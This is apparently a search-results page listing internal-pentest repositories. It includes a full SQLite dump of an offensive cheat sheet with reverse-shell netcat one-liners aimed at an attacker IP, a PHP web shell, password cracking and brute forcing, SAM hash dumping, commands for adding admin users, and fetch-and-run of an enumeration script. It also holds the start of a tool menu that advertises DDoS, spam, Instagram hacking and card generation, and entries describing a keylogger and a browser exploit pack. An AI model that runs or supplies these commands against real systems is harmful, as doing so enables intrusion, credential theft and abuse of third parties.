33 skills found · Page 1 of 2
swisskyrepo / InternalAllTheThingsActive Directory and Internal Pentest Cheatsheets
kp300 / ShotdroidShotDroid is a pentesting tool for android. There are 3 tools that have their respective functions, Get files from Android directory, internal and external storage, Android Keylogger + Reverse Shell and Take a webcam shot of the face from the front camera of the phone and PC.
julienbedard / BrowsersploitBrowserExploit is an advanced browser exploit pack for doing internal and external pentesting, helping gaining access to internal computers.
JFR-C / Windows Penetration TestingTechnical notes, AD pentest methodology, list of tools, scripts and Windows commands that are useful for internal penetration tests and assumed breach exercises (red teaming).
ADScanPro / AdscanADscan is a pentesting tool focused on automating collection, enumeration and common attack paths in Active Directory. It provides an interactive CLI with a wide range of commands to streamline internal audits and AD-focused pentests.
Viralmaniar / Remote Desktop Caching This tool allows one to recover old RDP (mstsc) session information in the form of broken PNG files. These PNG files allows Red Team member to extract juicy information such as LAPS passwords or any sensitive information on the screen. Blue Team member can reconstruct PNG files to see what an attacker did on a compromised host. It is extremely useful for a forensics team to extract timestamps after an attack on a host to collect evidences and perform further analysis.
Viralmaniar / PeekABooPeekABoo tool can be used during internal penetration testing when a user needs to enable Remote Desktop on the targeted machine. It uses PowerShell remoting to perform this task. Note: Remote desktop is disabled by default on all Windows operating systems.
Don-No7 / Hack SQL-- -- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021 -- -- Text encoding used: System -- PRAGMA foreign_keys = off; BEGIN TRANSACTION; -- Table: Commands CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (1, 'Kerbrute', 'brute single user password', 'kerbrute bruteuers [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (2, 'Kerbrute', 'brute username:password combos from file or stdin', 'kerbrute brutforce [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (3, 'Kerbrute', 'test a single password agains a list of users', 'kerbrute passwordspray [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (4, 'Kerbrute', 'Enumerate valid domain usernames via kerberos', 'kerbrute userenum [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (5, 'Name-That-Hash', 'Find the hash type of a string', 'nth --text ''<hash>''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (6, 'Name-That-Hash', 'Find the hash type of a file', 'nth --file <hash file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (7, 'Nmap', 'scan for vulnerabilites', 'nmap --script vuln <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (8, 'Nikto', 'Scan host for vulnerabilites', 'nikto -h <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (10, 'Hydra', 'Brutforce a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (11, 'SMBMap', 'enumerates SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (12, 'WPScan', 'Enumerate Wordpress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (13, 'WPScan', 'enumerate though known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (15, 'TheHarvester', 'gathering informaiton from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (17, 'Netcat', 'Connect to computer', 'nc <attacker ip> <attacker port>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (18, 'GoBuster', 'Eunmerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extention> -c PHPSESSID=<cookie val>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (19, 'SQLMap', 'map sql at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (20, 'John the Ripper', 'Use wordlist to parse hash', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (21, 'John the Ripper', 'unencrypt shadow file', 'john <Unshadowed passwds>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (22, 'Unshadow', 'combine /etc/passwd and /etc/shadow file for cracking', 'unshadow <passwd> <shadow>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (27, 'SMBClient', 'connect to a SMB share', 'smbclinet //<IP>/<share> -U <username>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (28, 'Netcat', 'connect with shell (-e doest always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (29, 'Netcat', 'connect with shell (-e doest always work)', '/bin/sh | nc ATTACKING-IP 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (31, 'SQLMap', 'Check form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" –forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (34, 'CrackMapExec', 'Command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (35, 'CrackMapExec', 'check logged in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<uesrname>'' -p ''<password>'' --local-auth --sam', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (38, 'CrackMapExec', 'list modules', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (39, 'CrackMapExec', 'pass the hash', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (41, 'IKE-Scan', 'attack pre shared key with dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (42, 'IKE-Scan', 'If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (43, 'IKE-Scan', 'to find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (44, 'John the Ripper', 'crack passwords with korelogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (45, 'Nmap', 'create a list of ip addresses ', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (46, 'Linux commands', 'mount NFS share on linux', 'mount -t nfs server:/share /mnt/point', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (47, 'PowerShell', 'create new user', 'net user <username> <password> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (48, 'PowerShell', 'add user to a group (normaly Administrators)', 'net localgroup <group> <username> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (50, 'PSK-Crack', 'dictianary attack', 'psk-crack -d <file> <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (51, 'SQLMap', 'check form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (52, 'SQLMap', 'Scan url for union + error based injection with mysql backend and use a random user agent + database dump', 'sqlmap -u "<form URL>?id=1>" --dbms=mysql --tech=U --random-agent --dump ', NULL); -- Table: Exploits CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Injection', 'ability to write to website folder', 'create or edit a mage of the website and insert the code to get remote access to the machine', '<? php system ($ _ GET [''cmd'']); ?>', 'execute code via url', '<URL of php>?cmd=<code to execue>'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'shell', 'enter code into the shell to find vulnerbilities int he machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFO bins and exploit'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to grain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change pyton varibale acordingly'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter into MySQL command line and break out into root y using the code', 'mysql> \! /bin/sh', 'get shell from root priv SQL', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'low privilage shell', 'use the code to search for programs that run as sudo without password', 'sudo -l', NULL, 'list programs that can be used with sudo and no password'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Windows', 'Priv Esc', 'Powershell', 'use code to enumerate priv esc opertunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', NULL, 'use Linenum.sh to enumerate linux box', 'wget https://www.linenum.sh/ -P /dev/shm/Linenum.sh; chmod +x /dev/shm/linenum.sh ; ./dev/shm/Linenum.sh | tee /dev/shm/lininfo.txt', ' file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other methods of download like: curl or others found on google'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'JWT', 'a site that uses jSON as cookies', 'edit the information (with BURP) thats going to the website to gain access without authenitaction', NULL, NULL, NULL); -- Table: Programs CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('BURP Suit', 'Enum, Exploit', 'A program for manipulating HTTP requests, enumeration and Exploit', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Metasploit', 'All', 'Powerfull swiss-army-knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Snort', 'Utility', 'Packet sniffer', 'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20210128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210128T192737Z&X-Amz-Expires=172800&X-Amz-SignedHeaders=host&X-Amz-Signature=4b51dc730677d14203c4a4cde25c1831ac64e9eca8df89c6737701811fa3f9fd', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hydra', 'Exploit', 'Brutforcer for wesite passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Mimikatz', 'Post', 'Used to exploit kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Impacket', 'Exploit', 'The fascilitator of python bassed script that uses modules for attacking windows ', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Enum4Linux', 'Enum', 'for Enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Rubeus', 'Exploit', 'Used for kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Kerbrute', 'Enum, Exploit', 'quickly enumerate and brutforce active directory accounts through kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('John the Ripper', 'Exploit', 'a password brutforcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hashcat', 'Exploit', 'A password bruteforces', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hash-Identifier', 'Utility', '(superseeded by Name-That-Hash)A simple python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Scp', 'Utility', 'For transfering files over SSH connection', 'man pages on llinux', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBClient', 'Utility', 'Used to connect to SMB file shares, can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PowerShell', 'Utility', 'Powerfull comand line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Vim', 'Utiility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('LinPeas', 'Post', 'For Enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nikto', 'Enum', 'For full enumeration on websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Radare2', 'Utility', 'A tooll used to reverse engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Evil-WinRM', 'Exploit', 'Malware exuivilent of WinRM and used to exploit windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WinPeas', 'Post', 'For full enumeration of windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('KEETheif', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interacction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('jSQLInjection', 'Enum', 'used for gathering SQL databse information form a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hping', 'Enum', 'Ping command on steroids, used to enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux Exploit Suggester', 'Post', 'keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unix-PrivEsc-Check', 'Post', ' It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps, written in a single shell script so is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Dotdotpwn', 'Enum', 'It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Websploit', 'Enum, Exploit', 'Swiss-army-knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Name-That-Hash', 'Utility', 'Hash-identifier with more deatils and command line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBMap', 'Enum', 'enumerate shares over a domin', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Redis-Cli', 'Exploit', 'used for interacting and exploiting reddis-cli on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unshadow', 'POST', 'Combining passwd and shadow files into 1', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WPScan', 'Enum', 'Look for vulnerabilities in wordpress site', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Netcat', 'Utility', 'used for connecting 2 computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux commands', 'Post', 'Linux commands used for Priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CrackMapExec', 'Enum,, Exploit', 'Swis army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('IKE-Scan', 'Enum', 'Used to dicover, fingerprint and test IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PSK-Crack', 'Exploit', 'attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CeWL', 'Enum', 'spiders a given url returning a wordlist that is intednded for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL); COMMIT TRANSACTION; PRAGMA foreign_keys = on;
Viralmaniar / HiveJackThis tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM, SECURITY and SAM hives and once copied to the attacker machines provides option to delete these files to clear the trace.
nullenc0de / Internal PentestScripts that automate portions of pentests.
MrAstra96 / Mytools#TOOL INSTALLER V.1.0 #CODED BY : Mr.Astra96 #CODENAME : DheMell bi='\033[34;1m' #biru ij='\033[32;1m' #ijo pr='\033[35;1m' #purple cy='\033[36;1m' #cyan me='\033[31;1m' #merah pu='\033[37;1m' #putih ku='\033[33;1m' #kuning or='\033[1;38;5;208m' #Orange echo "-----------------------------------------------------------" toilet -f pagga " Kalsel{Z}Tool"|lolcat echo "-----------------------------------------------------------" echo $ij"[+]─────────────────────────────────────────────────────[+]" echo $ij" | •••••••••• |Kalsel[E]Xploit| •••••••••••• |" echo $ij" | ───────────────────────────────────────────────────── |" echo $ij" | VERSION TOOL: INSTALLER V.1.0 |" echo $ij" | Author : Mr.Astra |" echo $ij" | CodeName : IY×TraCode |" echo $ij" | Instagram : mr_astra96 |" echo $ij" | Telegram : htttps://t.me/RabbitCL4Y |" echo $ij" | Github : https://github.com/RabbitCL4Y |" echo $ij" | Thanks To : •Santri Pasuruan• |" echo $ij" | COPYRIGHT : 2K19 Kalsel[E]Xploit |" echo $ij"[+]─────────────────────────────────────────────────────[+]" echo echo $pu"───────────────────────────────────────────" echo $or"[00]" $pu"About" $ku"Tool" $ij"Program" echo $pu"───────────────────────────────────────────" echo $pu"───────────────────────────────────────────" echo $me" Kalsel[E]Xploit×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[01]" $ku"SPAM-CALL |" echo $cy"[02]" $pu"Yt-Downloader |" echo $cy"[03]" $me"DORK-SCANNER |" echo $cy"[04]" $pr"REV-IP |" echo $cy"[05]" $ij"CHECK-IP |" echo $cy"[06]" $bi"INSTAHACK |" echo $cy"[07]" $or"AdminFinder |" echo $cy"[08]" $ku"DDoS |" echo $cy"[09]" $pu"MD5-CRACKER |" echo $cy"[10]" $me"CAPING-BOT |" echo $cy"[11]" $pr"MAIL-SPAMMER |" echo $cy"[12]" $ij"Im3-Spammer |" echo $cy"[13]" $bi"Create-Bot-SSH |" echo $cy"[14]" $or"ghoul |" echo $cy"[15]" $ku"SQLI-Vuln-Checker |" echo $cy"[16]" $pu"Wp-Scan |" echo $cy"[17]" $me"NAS |" echo $cy"[18]" $pr"Mp4-Convert |" echo $cy"[19]" $ij"Exploit-LokoMedia |" echo $cy"[20]" $bi"DDoS-With-Perl |" echo $cy"[21]" $or"ApkPure-Downloader |" echo $cy"[22]" $ku"GitHub-Info |" echo $cy"[23]" $pu"Proxy-Checker |" echo $cy"[24]" $me"PenKEX [Penetration Testing] |" echo $cy"[25]" $pr"Ysub-Checker |" echo $cy"[26]" $ij"Text-To-Hex |" echo $cy"[27]" $bi"Apk-Webdav (By :Kalsel[E]Xploit) |" echo $cy"[28]" $or"Pentester |" echo $cy"[29]" $ku"ASWPLOIT |" echo $cy"[30]" $pu"InFoGa {Information-Gathering} |" echo $pu"───────────────────────────────────────────" echo $me" ZseCc0de-Crew.ID×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[31]" $ku"ParrotSec |" echo $cy"[32]" $pu"GrabGithub |" echo $cy"[33]" $me"SubFinder |" echo $cy"[34]" $pr"RoliSpam |" echo $cy"[35]" $ij"Mail-Filter |" echo $cy"[36]" $bi"AdminScan |" echo $cy"[37]" $or"IPinfo |" echo $cy"[38]" $ku"CardGen |" echo $cy"[39]" $pu"CardValidator |" echo $cy"[40]" $me"BlogGrab |" echo $cy"[41]" $pr"IgStalker |" echo $cy"[42]" $ij"GpsTrack |" echo $cy"[43]" $bi"UrlDecode |" echo $cy"[44]" $or"Checker |" 